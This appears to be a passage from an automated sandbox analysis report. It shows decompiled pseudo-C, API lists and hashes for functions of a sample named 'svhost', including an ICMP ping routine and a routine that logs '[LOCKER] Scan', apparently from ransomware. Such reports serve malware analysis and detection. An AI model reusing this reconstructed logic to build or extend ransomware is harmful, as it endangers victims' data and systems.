                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: c92480e892037f4d00f0b2e517b6adc2e03a1986c07a00f557a1ee9cc36f7a71
                                      • Instruction ID: bb717c5b23d2354adf2e60d75b9a4380c16271c0fc7d5dc2a0f43ad5b36b3f43
                                      • Opcode Fuzzy Hash: c92480e892037f4d00f0b2e517b6adc2e03a1986c07a00f557a1ee9cc36f7a71
                                      • Instruction Fuzzy Hash: A34119B1A00209AFE700AF65D845BEEB7F8EB48714F14913AF51DF7280D735A90187A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E56F00 Relevance: 13.6, APIs: 9, Instructions: 137COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E00E56F00(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, signed char _a8, intOrPtr _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v29;
				char _v30;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v84;
				signed int _t56;
				signed int _t57;
				signed char _t62;
				signed char _t66;
				signed char _t67;
				signed char _t69;
				signed char _t80;
				void* _t87;
				void* _t123;
				void* _t124;
				signed int _t125;

				_t124 = __esi;
				_t123 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(0xec0560);
				_push( *[fs:0x0]);
				_t56 =  *0xeef074; // 0x221cac15
				_t57 = _t56 ^ _t125;
				_v20 = _t57;
				_push(_t57);
				 *[fs:0x0] =  &_v16;
				_v28 = __ecx;
				_v36 = 0;
				E00E57780( &_v24, _v28 + 0x14);
				_v8 = 0;
				if((_a8 & 0x000000ff) == 0) {
					_t62 = E00E54620(_v28);
					__eflags = _t62 & 0x000000ff;
					if((_t62 & 0x000000ff) != 0) {
						L8:
						_v30 = 0;
						_v8 = 0xffffffff;
						E00E57740();
						L23:
						 *[fs:0x0] = _v16;
						return E00E89A35(_t87, _v20 ^ _t125, _t122, _t123, _t124);
					}
					_t66 = E00E54650(_v28);
					_t122 = _t66 & 0x000000ff;
					__eflags = _t66 & 0x000000ff;
					if((_t66 & 0x000000ff) != 0) {
						goto L8;
					}
					_t67 = E00E545F0(_v28);
					__eflags = _t67 & 0x000000ff;
					if((_t67 & 0x000000ff) == 0) {
						L9:
						_t122 = _a4 & 0x000000ff;
						__eflags = _a4 & 0x000000ff;
						if((_a4 & 0x000000ff) == 0) {
							_t69 = E00E545C0(_v28);
							__eflags = _t69 & 0x000000ff;
							if((_t69 & 0x000000ff) != 0) {
								_v36 = 2;
							}
							_t122 = _v28;
							 *((intOrPtr*)(_v28 + 4)) = 2;
							__eflags = _v28 + 0xc8;
							E00E7182A(_t69);
						} else {
							 *((intOrPtr*)(_v28 + 4)) = 4;
							_v36 = 1;
						}
						_v8 = 0xffffffff;
						E00E57740();
						_v40 = _v36;
						__eflags = _v40 - 1;
						if(_v40 == 1) {
							E00E534F0(_v28 + 0x50);
							_t122 = _v28;
							__eflags =  *(_t122 + 0x44);
							if( *(_t122 + 0x44) != 0) {
								E00E5ABA0( *((intOrPtr*)(E00E53840( &_v44, _v28))));
								_v8 = 1;
								_t122 =  &_v84;
								E00E53910(_t87,  &_v84,  &_v84, _t123, _t124, __eflags,  &_v84, 0x10);
								_v8 = 0xffffffff;
								E00E538A0( &_v84);
							}
						} else {
							__eflags = _v40 - 2;
							if(__eflags == 0) {
								_t80 = E00E58A10(_v28 + 0xd8, __eflags);
								__eflags = _t80 & 0x000000ff;
								if((_t80 & 0x000000ff) != 0) {
									__eflags = _v28 + 0xd8;
									_t80 = E00E57360(_v28 + 0xd8, _v28 + 0xd8);
								}
								E00E516F0(_t80, _v28 + 0x50);
							}
						}
						goto L23;
					}
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						goto L9;
					}
					goto L8;
				}
				_t122 = _v28;
				if( *((intOrPtr*)(_v28 + 4)) != 4) {
					E00E588F0(_v28 + 0xc, __eflags, _a16);
					goto L9;
				} else {
					_v29 = 0;
					_v8 = 0xffffffff;
					E00E57740();
					goto L23;
				}
			}

























                                      0x00e56f00
                                      0x00e56f00
                                      0x00e56f00
                                      0x00e56f03
                                      0x00e56f05
                                      0x00e56f10
                                      0x00e56f14
                                      0x00e56f19
                                      0x00e56f1b
                                      0x00e56f1e
                                      0x00e56f22
                                      0x00e56f28
                                      0x00e56f2b
                                      0x00e56f3c
                                      0x00e56f41
                                      0x00e56f4e
                                      0x00e56f8a
                                      0x00e56f92
                                      0x00e56f94
                                      0x00e56fbc
                                      0x00e56fbc
                                      0x00e56fc0
                                      0x00e56fca
                                      0x00e570c4
                                      0x00e570c7
                                      0x00e570dc
                                      0x00e570dc
                                      0x00e56f99
                                      0x00e56f9e
                                      0x00e56fa1
                                      0x00e56fa3
                                      0x00000000
                                      0x00000000
                                      0x00e56fa8
                                      0x00e56fb0
                                      0x00e56fb2
                                      0x00e56fd7
                                      0x00e56fd7
                                      0x00e56fdb
                                      0x00e56fdd
                                      0x00e56ff5
                                      0x00e56ffd
                                      0x00e56fff
                                      0x00e57001
                                      0x00e57001
                                      0x00e57008
                                      0x00e5700b
                                      0x00e57015
                                      0x00e5701b
                                      0x00e56fdf
                                      0x00e56fe2
                                      0x00e56fe9
                                      0x00e56fe9
                                      0x00e57020
                                      0x00e5702a
                                      0x00e57032
                                      0x00e57035
                                      0x00e57039
                                      0x00e57079
                                      0x00e5707e
                                      0x00e57081
                                      0x00e57085
                                      0x00e57099
                                      0x00e5709e
                                      0x00e570a7
                                      0x00e570ab
                                      0x00e570b3
                                      0x00e570bd
                                      0x00e570bd
                                      0x00e5703b
                                      0x00e5703b
                                      0x00e5703f
                                      0x00e5704c
                                      0x00e57054
                                      0x00e57056
                                      0x00e5705b
                                      0x00e57061
                                      0x00e57061
                                      0x00e5706c
                                      0x00e5706c
                                      0x00e5703f
                                      0x00000000
                                      0x00e570c2
                                      0x00e56fb8
                                      0x00e56fba
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e56fba
                                      0x00e56f50
                                      0x00e56f57
                                      0x00e56f80
                                      0x00000000
                                      0x00e56f59
                                      0x00e56f59
                                      0x00e56f5d
                                      0x00e56f67
                                      0x00000000
                                      0x00e56f6c

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E56F3C
                                      • SafeRWList.LIBCONCRTD ref: 00E56F67
                                      • shared_ptr.LIBCMTD ref: 00E56F80
                                      • Concurrency::details::_Task_impl_base::_IsCompleted.LIBCPMTD ref: 00E56F8A
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E56F99
                                      • Concurrency::details::_Task_impl_base::_IsPendingCancel.LIBCPMTD ref: 00E56FA8
                                      • SafeRWList.LIBCONCRTD ref: 00E56FCA
                                      • SafeRWList.LIBCONCRTD ref: 00E5702A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_$ListSafeTask_impl_base::_$CancelCanceledCompletedCriticalLock::_PendingReentrantScoped_lockScoped_lock::_shared_ptr
                                      • String ID:
                                      • API String ID: 1003843333-0
                                      • Opcode ID: 3fbd065f7aca134a32c3f5392929dd7d91616be0a37045f2bae7be901052b193
                                      • Instruction ID: 095534f7e147b61456222d17425a5522381539dd7e5e28bb7ed72e0713584725
                                      • Opcode Fuzzy Hash: 3fbd065f7aca134a32c3f5392929dd7d91616be0a37045f2bae7be901052b193
                                      • Instruction Fuzzy Hash: 1F5171B0A041498BCF08DF94D452BFEBBB1BF4030AF44595DE9527B2C2DB359948DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E569E0 Relevance: 13.6, APIs: 9, Instructions: 96COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00E569E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, signed char _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebp;
				signed int _t34;
				signed int _t35;
				signed char _t44;
				void* _t58;
				void* _t60;
				intOrPtr _t87;
				void* _t88;
				void* _t89;
				signed int _t90;
				void* _t91;
				intOrPtr _t92;

				_t89 = __esi;
				_t88 = __edi;
				_t60 = __ebx;
				_push(0xffffffff);
				_push(0xec04b8);
				_push( *[fs:0x0]);
				_t92 = _t91 - 0x24;
				_t34 =  *0xeef074; // 0x221cac15
				_t35 = _t34 ^ _t90;
				_v20 = _t35;
				_push(_t35);
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				E00E515C0( &_v28, 8);
				E00E57830( &_v28, _v32 + 0x14);
				_v8 = 0;
				if((_a4 & 0x000000ff) != 0) {
					_t87 = _v32;
					_t95 =  *(_t87 + 0x6c) & 0x000000ff;
					if(( *(_t87 + 0x6c) & 0x000000ff) != 0) {
						_t58 = E00E54E90( &_v52, _t95,  &_v52, 2);
						_t92 = _t92 + 8;
						E00E724A0(_t95, _t58);
					}
				}
				if((E00E514D0() & 0x000000ff) != 0) {
					_t92 = _t92 - 8;
					_v40 = _t92;
					E00E51430(_v32 + 0xc);
					E00E7247D(_v32 + 0xc);
				}
				 *((char*)(_v32 + 0x6c)) = 1;
				E00E58510(_v32,  &_v28);
				while( *((intOrPtr*)(_v32 + 0x70)) == 0) {
					E00E522B0(_v32 + 0x44,  &_v28);
				}
				_t44 = E00E514D0();
				_t86 = _t44 & 0x000000ff;
				__eflags = _t44 & 0x000000ff;
				if((_t44 & 0x000000ff) != 0) {
					_v44 = _t92 - 8;
					__eflags = _v32 + 0xc;
					E00E51430(_v32 + 0xc);
					E00E7247D(__eflags);
				}
				_v36 = _v32 + 8;
				_v8 = 0xffffffff;
				E00E577E0();
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t90;
				return E00E89A35(_t60, _v20 ^ _t90, _t86, _t88, _t89);
			}
























                                      0x00e569e0
                                      0x00e569e0
                                      0x00e569e0
                                      0x00e569e3
                                      0x00e569e5
                                      0x00e569f0
                                      0x00e569f1
                                      0x00e569f4
                                      0x00e569f9
                                      0x00e569fb
                                      0x00e569fe
                                      0x00e56a02
                                      0x00e56a08
                                      0x00e56a10
                                      0x00e56a1f
                                      0x00e56a24
                                      0x00e56a31
                                      0x00e56a33
                                      0x00e56a3a
                                      0x00e56a3c
                                      0x00e56a44
                                      0x00e56a49
                                      0x00e56a4d
                                      0x00e56a4d
                                      0x00e56a3c
                                      0x00e56a62
                                      0x00e56a64
                                      0x00e56a69
                                      0x00e56a73
                                      0x00e56a78
                                      0x00e56a78
                                      0x00e56a80
                                      0x00e56a8b
                                      0x00e56a90
                                      0x00e56aa3
                                      0x00e56aa3
                                      0x00e56ab0
                                      0x00e56ab5
                                      0x00e56ab8
                                      0x00e56aba
                                      0x00e56ac1
                                      0x00e56ac7
                                      0x00e56acb
                                      0x00e56ad0
                                      0x00e56ad0
                                      0x00e56adb
                                      0x00e56ade
                                      0x00e56ae8
                                      0x00e56af3
                                      0x00e56afe
                                      0x00e56b08

                                      APIs
                                      • unique_lock.LIBCONCRTD ref: 00E56A1F
                                      • std::make_error_code.LIBCPMTD ref: 00E56A44
                                        • Part of subcall function 00E54E90: std::generic_category.LIBCPMTD ref: 00E54E93
                                        • Part of subcall function 00E54E90: _Smanip.LIBCPMTD ref: 00E54EA0
                                        • Part of subcall function 00E724A0: std::future_error::future_error.LIBCPMT ref: 00E724B1
                                        • Part of subcall function 00E724A0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E724BF
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E56A58
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56A73
                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00E56A78
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E56AB0
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56ACB
                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00E56AD0
                                      • ~unique_lock.LIBCONCRTD ref: 00E56AE8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Rethrow_future_exceptionstd::_std::exception_ptr::exception_ptrstd::exception_ptr::~exception_ptr$Exception@8SmanipThrowstd::future_error::future_errorstd::generic_categorystd::make_error_codeunique_lock~unique_lock
                                      • String ID:
                                      • API String ID: 685526741-0
                                      • Opcode ID: 3209ffb9e8b1ea57d6f7617b8bba1289ac5a9048539e70f7133c585adec8aaac
                                      • Instruction ID: aa0e5e0e691a63357fec7cb0c4209f9d36a4fcf5b326d4fa24bbb50f71cd31e6
                                      • Opcode Fuzzy Hash: 3209ffb9e8b1ea57d6f7617b8bba1289ac5a9048539e70f7133c585adec8aaac
                                      • Instruction Fuzzy Hash: B2314171D042099BCF08EBA8D852BBFB7F5BF44305F44955DE92277282EB349909CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6DB40 Relevance: 13.6, APIs: 9, Instructions: 95fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 49%
                                      			E00E6DB40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v36;
				char _v37;
				intOrPtr _v44;
				char _v45;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _t38;
				signed char _t41;
				intOrPtr _t49;
				intOrPtr _t53;
				signed int _t79;

				_t78 = __esi;
				_t77 = __edi;
				_t58 = __ebx;
				_t38 =  *0xeef074; // 0x221cac15
				_v8 = _t38 ^ _t79;
				_v72 = __ecx;
				_v45 = 0;
				_t41 = E00E579A0(_a4);
				_t84 = _t41 & 0x000000ff;
				if((_t41 & 0x000000ff) != 0) {
					L11:
					__eflags = 0;
				} else {
					_t74 = _a4;
					E00E6DC80(__ebx,  &_v10, _a4, __edi, __esi, _t84,  &_v36, E00E51650(_a4));
					if((E00E579A0( &_v36) & 0x000000ff) != 0) {
						L10:
						E00E57F50( &_v36);
						goto L11;
					} else {
						_t49 = E00E57E90();
						__imp__#11(_t49);
						_v60 = _t49;
						if(_v60 == 0xffffffff) {
							goto L10;
						} else {
							__imp__IcmpCreateFile();
							_v44 = _t49;
							if(_v44 == 0xffffffff) {
								goto L10;
							} else {
								_t74 =  *0xed268a; // 0x0
								_v9 = _t74;
								_v56 = 0x1d;
								_push(_v56);
								_v52 = E00EA49B4();
								if(_v52 == 0) {
									__imp__IcmpCloseHandle(_v44);
									goto L10;
								} else {
									_t53 = _v44;
									__imp__IcmpSendEcho(_t53, _v60,  &_v9, 1, 0, _v52, _v56, _a8);
									_v68 = _t53;
									__imp__IcmpCloseHandle(_v44);
									_t74 = _v52;
									E00EA478C(_v52);
									if(_v68 == 0) {
										_v64 = 0;
									} else {
										_v64 = 1;
									}
									_v37 = _v64;
									E00E57F50( &_v36);
								}
							}
						}
					}
				}
				return E00E89A35(_t58, _v8 ^ _t79, _t74, _t77, _t78);
			}





















                                      0x00e6db40
                                      0x00e6db40
                                      0x00e6db40
                                      0x00e6db46
                                      0x00e6db4d
                                      0x00e6db50
                                      0x00e6db55
                                      0x00e6db5b
                                      0x00e6db63
                                      0x00e6db65
                                      0x00e6dc61
                                      0x00e6dc61
                                      0x00e6db6b
                                      0x00e6db6b
                                      0x00e6db7f
                                      0x00e6db91
                                      0x00e6dc59
                                      0x00e6dc5c
                                      0x00000000
                                      0x00e6db97
                                      0x00e6db9a
                                      0x00e6dba0
                                      0x00e6dba6
                                      0x00e6dbad
                                      0x00000000
                                      0x00e6dbb3
                                      0x00e6dbb3
                                      0x00e6dbb9
                                      0x00e6dbc0
                                      0x00000000
                                      0x00e6dbc6
                                      0x00e6dbc6
                                      0x00e6dbcc
                                      0x00e6dbcf
                                      0x00e6dbd9
                                      0x00e6dbe2
                                      0x00e6dbe9
                                      0x00e6dc53
                                      0x00000000
                                      0x00e6dbeb
                                      0x00e6dc03
                                      0x00e6dc07
                                      0x00e6dc0d
                                      0x00e6dc14
                                      0x00e6dc1a
                                      0x00e6dc1e
                                      0x00e6dc2a
                                      0x00e6dc35
                                      0x00e6dc2c
                                      0x00e6dc2c
                                      0x00e6dc2c
                                      0x00e6dc3f
                                      0x00e6dc45
                                      0x00e6dc4a
                                      0x00e6dbe9
                                      0x00e6dbc0
                                      0x00e6dbad
                                      0x00e6db91
                                      0x00e6dc70

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DB5B
                                        • Part of subcall function 00E6DC80: task.LIBCPMTD ref: 00E6DCE2
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DB87
                                      • inet_addr.WS2_32(00000000), ref: 00E6DBA0
                                      • IcmpCreateFile.IPHLPAPI ref: 00E6DBB3
                                      • IcmpSendEcho.IPHLPAPI(000000FF,000000FF,?,00000001,00000000,00000000,0000001D,?), ref: 00E6DC07
                                      • IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC14
                                        • Part of subcall function 00EA478C: _free.LIBCMT ref: 00EA479F
                                      • task.LIBCPMTD ref: 00E6DC45
                                      • IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC53
                                      • task.LIBCPMTD ref: 00E6DC5C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Icmp$task$CloseHandlestd::ios_base::good$CreateEchoFileSend_freeinet_addr
                                      • String ID:
                                      • API String ID: 2824824022-0
                                      • Opcode ID: 87a74e717531f42ed9ba6a134994156ea0d682d5566056ce5242448c7483ba86
                                      • Instruction ID: 14261152e66f8641f66691c9bdbf90b246620a80dcdfb14014e2a9d2cc746b6c
                                      • Opcode Fuzzy Hash: 87a74e717531f42ed9ba6a134994156ea0d682d5566056ce5242448c7483ba86
                                      • Instruction Fuzzy Hash: 19315EB1D04208AFCF04EFA4E895AEEBBB4AF58300F441129F546B7291DB719909DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E558E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 198COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00E558E0(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, char _a8, char _a12, signed int _a16) {
				char _v16;
				signed int _v20;
				char _v24;
				void* _v32;
				char _v56;
				signed int _v57;
				signed int _v64;
				char _v65;
				char _v66;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v120;
				char _v128;
				char _v140;
				signed int _t67;
				signed int _t68;
				void* _t76;
				void* _t93;
				void* _t94;
				signed char _t104;
				signed int _t106;
				void* _t108;
				intOrPtr* _t117;
				void* _t118;
				void* _t168;
				void* _t169;
				signed int _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t183;

				_t183 = __fp0;
				_t169 = __esi;
				_t168 = __edi;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(0xec0460);
				_push( *[fs:0x0]);
				_t172 = _t171 - 0x7c;
				_t67 =  *0xeef074; // 0x221cac15
				_t68 = _t67 ^ _t170;
				_v20 = _t68;
				_push(_t68);
				 *[fs:0x0] =  &_v16;
				if((E00E579A0(_a4) & 0x000000ff) == 0) {
					_v57 = 0;
					E00E515C0( &_v24, 4);
					E00E5A730( &_v24, _a16);
					_t173 = _t172 + 8;
					while(1) {
						_t76 = E00E5A750( &_v104, _a16);
						_t174 = _t173 + 8;
						if((E00E56500( &_v24, _t76) & 0x000000ff) == 0) {
							break;
						}
						_push(0);
						_t108 = E00E51950( &_v128, 1);
						_t173 = _t174 + 0xc;
						if(E00E5A770(_t118, E00E56560( &_v24) + 0x18, _t168, _t169, _t183, _t108) != 0) {
							L8:
							E00E56540( &_v24);
							continue;
						} else {
							_v76 = _v24;
							E00E565F0(_a16,  &_v108, _v76);
							if((E00E565B0(_a16) & 0x000000ff) == 0) {
								_t117 = E00E5A730( &_v112, _a16);
								_t173 = _t173 + 8;
								_v24 =  *_t117;
								goto L8;
							}
						}
						break;
					}
					_t159 = _a16;
					_v72 = _a16;
					_v64 = E00E51BE0(_v72);
					_v80 = E00E51BF0(_v72);
					while(1) {
						__eflags = _v64 - _v80;
						if(_v64 == _v80) {
							break;
						}
						_v84 = _v64;
						_t104 = E00E5A7B0(_v84, _a4);
						_t174 = _t174 + 8;
						_t159 = _t104 & 0x000000ff;
						__eflags = _t104 & 0x000000ff;
						if((_t104 & 0x000000ff) == 0) {
							_t106 = _v64 + 0x20;
							__eflags = _t106;
							_v64 = _t106;
							continue;
						} else {
							_v57 = 1;
						}
						break;
					}
					__eflags = _v57 & 0x000000ff;
					if((_v57 & 0x000000ff) != 0) {
						E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v66), L"[LOCKER] Already Scan "), _a4), "\n");
					} else {
						E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v65), L"[LOCKER] Scan "), _a4), "\n");
						E00E55C20( &_v56);
						E00E57B00( &_v56, _a4);
						_v88 = _a8;
						_v92 =  &M00E65690;
						_v96 = _a12;
						_v100 =  &M00E69520;
						_t93 = E00E5A7D0(__eflags,  &_v140,  &_v92,  &_v88, 0xed24eb, 0xed24ea);
						_t94 = E00E51650(_a4);
						_t159 =  &_v120;
						E00E550F0(E00E5A820(_t118, _t168, _t169,  &_v120, 1,  &_v100,  &_v96, _t94, _t93));
						E00E55160( &_v120);
						E00E55B40(_a16, E00E51650( &_v56));
						E00E55C50( &_v56);
					}
				}
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t170;
				return E00E89A35(_t118, _v20 ^ _t170, _t159, _t168, _t169);
			}












































                                      0x00e558e0
                                      0x00e558e0
                                      0x00e558e0
                                      0x00e558e0
                                      0x00e558e3
                                      0x00e558e5
                                      0x00e558f0
                                      0x00e558f1
                                      0x00e558f4
                                      0x00e558f9
                                      0x00e558fb
                                      0x00e558fe
                                      0x00e55902
                                      0x00e55915
                                      0x00e5591b
                                      0x00e55924
                                      0x00e55931
                                      0x00e55936
                                      0x00e55943
                                      0x00e5594b
                                      0x00e55950
                                      0x00e55961
                                      0x00000000
                                      0x00000000
                                      0x00e55963
                                      0x00e5596b
                                      0x00e55970
                                      0x00e55988
                                      0x00e559c8
                                      0x00e5593e
                                      0x00000000
                                      0x00e5598a
                                      0x00e5598d
                                      0x00e5599b
                                      0x00e559ad
                                      0x00e559b7
                                      0x00e559bc
                                      0x00e559c1
                                      0x00000000
                                      0x00e559c1
                                      0x00e559ad
                                      0x00000000
                                      0x00e55988
                                      0x00e559cd
                                      0x00e559d0
                                      0x00e559db
                                      0x00e559e6
                                      0x00e559f4
                                      0x00e559f7
                                      0x00e559fa
                                      0x00000000
                                      0x00000000
                                      0x00e559ff
                                      0x00e55a0a
                                      0x00e55a0f
                                      0x00e55a12
                                      0x00e55a15
                                      0x00e55a17
                                      0x00e559ee
                                      0x00e559ee
                                      0x00e559f1
                                      0x00000000
                                      0x00e55a19
                                      0x00e55a19
                                      0x00e55a19
                                      0x00000000
                                      0x00e55a17
                                      0x00e55a25
                                      0x00e55a27
                                      0x00e55b21
                                      0x00e55a2d
                                      0x00e55a53
                                      0x00e55a5b
                                      0x00e55a67
                                      0x00e55a6f
                                      0x00e55a72
                                      0x00e55a7c
                                      0x00e55a7f
                                      0x00e55a9f
                                      0x00e55aac
                                      0x00e55abf
                                      0x00e55acf
                                      0x00e55ad7
                                      0x00e55aec
                                      0x00e55af4
                                      0x00e55af4
                                      0x00e55a27
                                      0x00e55b29
                                      0x00e55b34
                                      0x00e55b3e

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E5590B
                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00E55957
                                      • std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 00E55977
                                        • Part of subcall function 00E5A770: std::make_error_code.LIBCPMTD ref: 00E5A78E
                                      • shared_ptr.LIBCPMTD ref: 00E55ACF
                                      • ~.LIBCPMTD ref: 00E55AF4
                                        • Part of subcall function 00E51950: DName::DName.LIBCMTD ref: 00E5195A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Affinity::operator!=Concurrency::details::HardwareMutex_baseMutex_base::~_NameName::shared_ptrstd::_std::ios_base::goodstd::make_error_code
                                      • String ID: [LOCKER] Already Scan $[LOCKER] Scan
                                      • API String ID: 1668837174-3324642398
                                      • Opcode ID: 43a4657ec93ede8d314ff0129b459fb4480a723a97a5fbaad7fcdda4f377e788
                                      • Instruction ID: 4fc44e3703f121ba29b1b71d1cc27c2f5f8b4f3c95059011ef985c747983a6e0
                                      • Opcode Fuzzy Hash: 43a4657ec93ede8d314ff0129b459fb4480a723a97a5fbaad7fcdda4f377e788
                                      • Instruction Fuzzy Hash: A1718772D002089BCB04EFA4D962EEE77B5AF54302F545929FD0677281FF34A909CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E62040 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E00E62040(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				char _v16;
				signed int _v20;
				char _v21;
				char _v48;
				signed int _v52;
				char _v53;
				char _v54;
				intOrPtr _v60;
				signed int _v64;
				signed int _t40;
